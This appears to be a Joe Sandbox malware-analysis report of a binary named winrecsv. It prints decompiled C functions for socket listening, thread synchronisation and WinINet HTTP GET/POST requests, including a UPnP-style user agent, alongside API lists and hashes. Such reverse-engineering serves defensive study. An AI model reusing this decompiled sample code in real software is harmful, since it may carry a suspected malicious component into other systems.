                                                                                  0x00000000
                                                                                  0x0040e935
                                                                                  0x0040e93b
                                                                                  0x0040e941
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040E7AC
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E7BF
                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E7D9
                                                                                  • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E7F6
                                                                                  • accept.WS2_32(?,?,?), ref: 0040E828
                                                                                  • GetTickCount.KERNEL32 ref: 0040E876
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E889
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8AA
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8BB
                                                                                  • GetTickCount.KERNEL32 ref: 0040E8C3
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E8D2
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E8E5
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E925
                                                                                  • GetTickCount.KERNEL32 ref: 0040E92B
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E93B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 3345448188-3762367603
                                                                                  • Opcode ID: ddcfcdcee3c2ae824924be147f9dbba23bab9420998bd361808692b531119574
                                                                                  • Instruction ID: a4307afca7aad85b9c9d9f5dd23984def65cc417f4fb2f5aaa278dd0cd3fd46e
                                                                                  • Opcode Fuzzy Hash: ddcfcdcee3c2ae824924be147f9dbba23bab9420998bd361808692b531119574
                                                                                  • Instruction Fuzzy Hash: AE4117725002009BCB10AF36DC88B9B77A4AB44720F048E39F899A72D1D778EC95CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040D110(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				char* _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char _v852;
                                                                                  				long _v856;
                                                                                  				void _v1884;
                                                                                  				long _v1888;
                                                                                  				void* _t102;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t103 = _t102 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                  							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                  							_t29 =  &_v852; // 0x410928
                                                                                  							if(HttpSendRequestA(_v848,  *_t29, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                  								_v856 = 0;
                                                                                  								while(1 != 0) {
                                                                                  									_t98 = _v848;
                                                                                  									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                  										_v776 = E00408EA0(_v776, _t98, _v776, _v856 + _v1888);
                                                                                  										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                  										_t103 = _t103 + 0x14;
                                                                                  										_v856 = _v856 + _v1888;
                                                                                  										continue;
                                                                                  									}
                                                                                  									break;
                                                                                  								}
                                                                                  								 *_a16 = _v856;
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}






















                                                                                  0x0040d119
                                                                                  0x0040d123
                                                                                  0x0040d138
                                                                                  0x0040d13d
                                                                                  0x0040d140
                                                                                  0x0040d150
                                                                                  0x0040d156
                                                                                  0x0040d166
                                                                                  0x0040d16c
                                                                                  0x0040d188
                                                                                  0x0040d1a1
                                                                                  0x0040d1ae
                                                                                  0x0040d1da
                                                                                  0x0040d1e7
                                                                                  0x0040d210
                                                                                  0x0040d21d
                                                                                  0x0040d235
                                                                                  0x0040d23b
                                                                                  0x0040d251
                                                                                  0x0040d267
                                                                                  0x0040d26d
                                                                                  0x0040d277
                                                                                  0x0040d297
                                                                                  0x0040d2a6
                                                                                  0x0040d2cf
                                                                                  0x0040d2f0
                                                                                  0x0040d2f5
                                                                                  0x0040d304
                                                                                  0x00000000
                                                                                  0x0040d304
                                                                                  0x00000000
                                                                                  0x0040d2a6
                                                                                  0x0040d318
                                                                                  0x0040d318
                                                                                  0x0040d321
                                                                                  0x0040d321
                                                                                  0x0040d32e
                                                                                  0x0040d32e
                                                                                  0x0040d33b
                                                                                  0x0040d33b
                                                                                  0x0040d34a

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D138
                                                                                  • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040D188
                                                                                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040D19B
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040D1D4
                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040D20A
                                                                                  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040D235
                                                                                  • HttpSendRequestA.WININET(00000000,(A,000000FF,00009E34), ref: 0040D25F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040D29E
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040D2F0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D321
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D32E
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D33B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                  • String ID: (A$<$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                  • API String ID: 2761394606-712686588
                                                                                  • Opcode ID: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction ID: 9d1df4d468acb1d33fa47fc6a9b1e55a6919e6c831fa6972c8ee7f2cc9406756
                                                                                  • Opcode Fuzzy Hash: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction Fuzzy Hash: 43511CB59012289BDB26CF94DC54BE973BDAB48705F1081E9B50DA6280D7B8AFC4CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 92%
                                                                                  			E0040E480(intOrPtr* __edi) {
                                                                                  				void* __esi;
                                                                                  				void* _t25;
                                                                                  				long _t40;
                                                                                  				intOrPtr* _t53;
                                                                                  				intOrPtr* _t55;
                                                                                  				void* _t56;
                                                                                  				LONG* _t62;
                                                                                  
                                                                                  				_t53 = __edi;
                                                                                  				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                  					return _t25;
                                                                                  				} else {
                                                                                  					_t1 = _t53 + 0x20; // 0x20
                                                                                  					EnterCriticalSection(_t1);
                                                                                  					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                  					if(_t55 == 0) {
                                                                                  						L11:
                                                                                  						_t13 = _t53 + 0x20; // 0x20
                                                                                  						LeaveCriticalSection(_t13);
                                                                                  						SetEvent( *(_t53 + 0x10));
                                                                                  						_t56 = 0;
                                                                                  						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                  							L14:
                                                                                  							E0040C040( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                  							E0040C180( *((intOrPtr*)(_t53 + 0xc)));
                                                                                  							CloseHandle( *(_t53 + 8));
                                                                                  							CloseHandle( *(_t53 + 0x10));
                                                                                  							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                  							E00409940( *((intOrPtr*)(_t53 + 0x14)));
                                                                                  							_t24 = _t53 + 0x20; // 0x20
                                                                                  							DeleteCriticalSection(_t24);
                                                                                  							return E00408FB0(_t53);
                                                                                  						}
                                                                                  						do {
                                                                                  							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                  						goto L14;
                                                                                  					} else {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					do {
                                                                                  						L3:
                                                                                  						if( *_t55 == 0x69636c69) {
                                                                                  							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                  								_t62 = _t55 + 0x21c;
                                                                                  								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                  								if(_t40 == 0) {
                                                                                  									 *(_t55 + 0x230) = _t40;
                                                                                  									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                  									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                  									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                  									InterlockedIncrement(_t62);
                                                                                  									if(E0040EAD0(_t55) == 0) {
                                                                                  										InterlockedDecrement(_t62);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                  					} while (_t55 != 0);
                                                                                  					goto L11;
                                                                                  				}
                                                                                  			}










                                                                                  0x0040e480
                                                                                  0x0040e482
                                                                                  0x0040e5b7
                                                                                  0x0040e494
                                                                                  0x0040e496
                                                                                  0x0040e49a
                                                                                  0x0040e4a0
                                                                                  0x0040e4a5
                                                                                  0x0040e530
                                                                                  0x0040e530
                                                                                  0x0040e534
                                                                                  0x0040e53e
                                                                                  0x0040e544
                                                                                  0x0040e549
                                                                                  0x0040e563
                                                                                  0x0040e569
                                                                                  0x0040e572
                                                                                  0x0040e584
                                                                                  0x0040e58a
                                                                                  0x0040e590
                                                                                  0x0040e59a
                                                                                  0x0040e5a2
                                                                                  0x0040e5a6
                                                                                  0x00000000
                                                                                  0x0040e5b6
                                                                                  0x0040e551
                                                                                  0x0040e55b
                                                                                  0x0040e55d
                                                                                  0x0040e55e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e4ab
                                                                                  0x0040e4ab
                                                                                  0x0040e4b1
                                                                                  0x0040e4d3
                                                                                  0x0040e4d7
                                                                                  0x0040e4de
                                                                                  0x0040e4e6
                                                                                  0x0040e4ec
                                                                                  0x0040e4f2
                                                                                  0x0040e4fc
                                                                                  0x0040e502
                                                                                  0x0040e50c
                                                                                  0x0040e519
                                                                                  0x0040e51c
                                                                                  0x0040e51c
                                                                                  0x0040e519
                                                                                  0x0040e4e6
                                                                                  0x0040e4d3
                                                                                  0x0040e522
                                                                                  0x0040e528
                                                                                  0x00000000
                                                                                  0x0040e4ab

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00000020,0040BD00,?,0040F024), ref: 0040E49A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E4C6
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E4DE
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040E50C
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E51C
                                                                                  • LeaveCriticalSection.KERNEL32(00000020,?,0040F024), ref: 0040E534
                                                                                  • SetEvent.KERNEL32(?,?,0040F024), ref: 0040E53E
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040F024), ref: 0040E55B
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E584
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E58A
                                                                                  • WSACloseEvent.WS2_32(?), ref: 0040E590
                                                                                  • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040F024), ref: 0040E5A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 2403999931-3762367603
                                                                                  • Opcode ID: 7edd7c1c4f50b0dd13758a6fdc0e9c87cf719057548fc6c1492c4cc13c3ad051
                                                                                  • Instruction ID: 93d8e349b18169af685d7a21951132cbb8c9c0fe64a1f5b9dbcdc35934fd6ed3
                                                                                  • Opcode Fuzzy Hash: 7edd7c1c4f50b0dd13758a6fdc0e9c87cf719057548fc6c1492c4cc13c3ad051
                                                                                  • Instruction Fuzzy Hash: D3317475500705BBC710DBB1EC48B97B7A8BF08314F048E2EE95AA3691D778F864CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040C610(char* _a4, char** _a8) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				long _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char* _v852;
                                                                                  				void _v1876;
                                                                                  				long _v1880;
                                                                                  				void* _t91;
                                                                                  				void* _t92;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t92 = _t91 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                  								if(_a8 == 0) {
                                                                                  									_v776 = 1;
                                                                                  								} else {
                                                                                  									_v852 = 0;
                                                                                  									while(1 != 0) {
                                                                                  										_t87 = _v848;
                                                                                  										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                  											_v776 = E00408EA0(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                  											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                  											_t92 = _t92 + 0x14;
                                                                                  											_v852 =  &(_v852[_v1880]);
                                                                                  											continue;
                                                                                  										}
                                                                                  										break;
                                                                                  									}
                                                                                  									 *_a8 = _v852;
                                                                                  								}
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}





















                                                                                  0x0040c619
                                                                                  0x0040c623
                                                                                  0x0040c638
                                                                                  0x0040c63d
                                                                                  0x0040c640
                                                                                  0x0040c650
                                                                                  0x0040c656
                                                                                  0x0040c666
                                                                                  0x0040c66c
                                                                                  0x0040c688
                                                                                  0x0040c69e
                                                                                  0x0040c6ab
                                                                                  0x0040c6d7
                                                                                  0x0040c6e4
                                                                                  0x0040c70d
                                                                                  0x0040c71a
                                                                                  0x0040c737
                                                                                  0x0040c741
                                                                                  0x0040c7f6
                                                                                  0x0040c747
                                                                                  0x0040c747
                                                                                  0x0040c751
                                                                                  0x0040c771
                                                                                  0x0040c780
                                                                                  0x0040c7a9
                                                                                  0x0040c7ca
                                                                                  0x0040c7cf
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c780
                                                                                  0x0040c7f2
                                                                                  0x0040c7f2
                                                                                  0x0040c741
                                                                                  0x0040c807
                                                                                  0x0040c807
                                                                                  0x0040c814
                                                                                  0x0040c814
                                                                                  0x0040c821
                                                                                  0x0040c821
                                                                                  0x0040c830

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040C638
                                                                                  • InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040C7CA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C814
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C821
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                  • String ID: <$GET
                                                                                  • API String ID: 1205665004-427699995
                                                                                  • Opcode ID: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction ID: 09436683f8244ffa9c701ea93985ed9ede5934815d9b1926990d38fc667447ad
                                                                                  • Opcode Fuzzy Hash: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction Fuzzy Hash: 29512C759012289BDB35CB50CC99BD9B3BCAB48705F1081E9E60DAA2C0D7B86FC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 80%
                                                                                  			E0040C040(LONG* _a4, intOrPtr _a8) {
                                                                                  				int _v8;
                                                                                  				long _v12;
                                                                                  				LONG* _v16;
                                                                                  				signed char _v17;
                                                                                  				long _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t57;
                                                                                  				intOrPtr _t80;
                                                                                  
                                                                                  				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                  				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                  				_v12 = 0;
                                                                                  				if(_a4 != 0) {
                                                                                  					_v16 = _a4;
                                                                                  					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                  						_v17 = 0 | _a8 != 0xffffffff;
                                                                                  						while(1 != 0) {
                                                                                  							_v24 = 0;
                                                                                  							EnterCriticalSection( &(_v16[1]));
                                                                                  							_v28 = 0;
                                                                                  							while(_v28 <  *_v16) {
                                                                                  								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                  									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                  									asm("sbb eax, eax");
                                                                                  									_v24 =  ~_t57 + 1 + _v24;
                                                                                  								} else {
                                                                                  									_v24 = _v24 + 1;
                                                                                  								}
                                                                                  								_v28 = _v28 + 1;
                                                                                  							}
                                                                                  							LeaveCriticalSection( &(_v16[1]));
                                                                                  							if(_v24 !=  *_v16) {
                                                                                  								if((_v17 & 0x000000ff) == 0) {
                                                                                  									L15:
                                                                                  									Sleep(1);
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									_t80 = _a8 - 1;
                                                                                  									_a8 = _t80;
                                                                                  									if(_t80 != 0) {
                                                                                  										goto L15;
                                                                                  									} else {
                                                                                  									}
                                                                                  								}
                                                                                  							} else {
                                                                                  								_v12 = 1;
                                                                                  							}
                                                                                  							goto L16;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L16:
                                                                                  				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                  				return _v12;
                                                                                  			}











                                                                                  0x0040c053
                                                                                  0x0040c05f
                                                                                  0x0040c065
                                                                                  0x0040c070
                                                                                  0x0040c079
                                                                                  0x0040c08a
                                                                                  0x0040c099
                                                                                  0x0040c09c
                                                                                  0x0040c0a9
                                                                                  0x0040c0b7
                                                                                  0x0040c0bd
                                                                                  0x0040c0cf
                                                                                  0x0040c0e6
                                                                                  0x0040c102
                                                                                  0x0040c10a
                                                                                  0x0040c112
                                                                                  0x0040c0e8
                                                                                  0x0040c0ee
                                                                                  0x0040c0ee
                                                                                  0x0040c0cc
                                                                                  0x0040c0cc
                                                                                  0x0040c11e
                                                                                  0x0040c12c
                                                                                  0x0040c13d
                                                                                  0x0040c14c
                                                                                  0x0040c14e
                                                                                  0x00000000
                                                                                  0x0040c13f
                                                                                  0x0040c142
                                                                                  0x0040c145
                                                                                  0x0040c148
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040c14a
                                                                                  0x0040c148
                                                                                  0x0040c12e
                                                                                  0x0040c12e
                                                                                  0x0040c12e
                                                                                  0x00000000
                                                                                  0x0040c12c
                                                                                  0x0040c09c
                                                                                  0x0040c08a
                                                                                  0x0040c159
                                                                                  0x0040c164
                                                                                  0x0040c170

                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C046
                                                                                  • GetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C04D
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C058
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C05F
                                                                                  • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040C082
                                                                                  • EnterCriticalSection.KERNEL32(000000FB), ref: 0040C0B7
                                                                                  • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040C102
                                                                                  • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040C11E
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040C14E
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C15D
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF), ref: 0040C164
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 3862671961-0
                                                                                  • Opcode ID: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction ID: b67d03a003be484ef9903f40ca498cf56af242f5343ef7d43787b118d94c6999
                                                                                  • Opcode Fuzzy Hash: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction Fuzzy Hash: E9414C74900209EBDB14DFA4D884BAEBB71FB48305F108266E915BB381D7799A81CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040EBE0(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                  				long _v4;
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char _v28;
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t64;
                                                                                  				void* _t73;
                                                                                  				void* _t106;
                                                                                  				void* _t108;
                                                                                  
                                                                                  				_t108 = __eax;
                                                                                  				_t106 = __ecx;
                                                                                  				if(_a4 != 0 || __ebx == 0) {
                                                                                  					InterlockedDecrement(_t108 + 0x14);
                                                                                  					_a4 = 1;
                                                                                  					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                  					 *((char*)(_t106 + 0x275)) = 1;
                                                                                  					_a6 = 0;
                                                                                  					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                  					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                  					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                  					return _t59;
                                                                                  				}
                                                                                  				InterlockedExchange(_t106 + 4, E0040C210());
                                                                                  				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                  				if(_t64 == 0) {
                                                                                  					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                  						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                  						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                  							InterlockedDecrement(_t108 + 0x14);
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
